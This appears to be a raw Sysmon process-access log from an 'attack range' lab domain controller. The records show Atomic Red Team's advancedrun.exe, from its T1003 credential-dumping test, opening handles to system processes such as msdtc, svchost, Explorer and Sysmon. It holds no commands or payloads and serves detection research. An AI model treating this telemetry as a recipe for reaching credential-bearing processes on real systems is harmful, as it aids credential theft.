AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953089Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953088Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953087Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953086Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003953073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
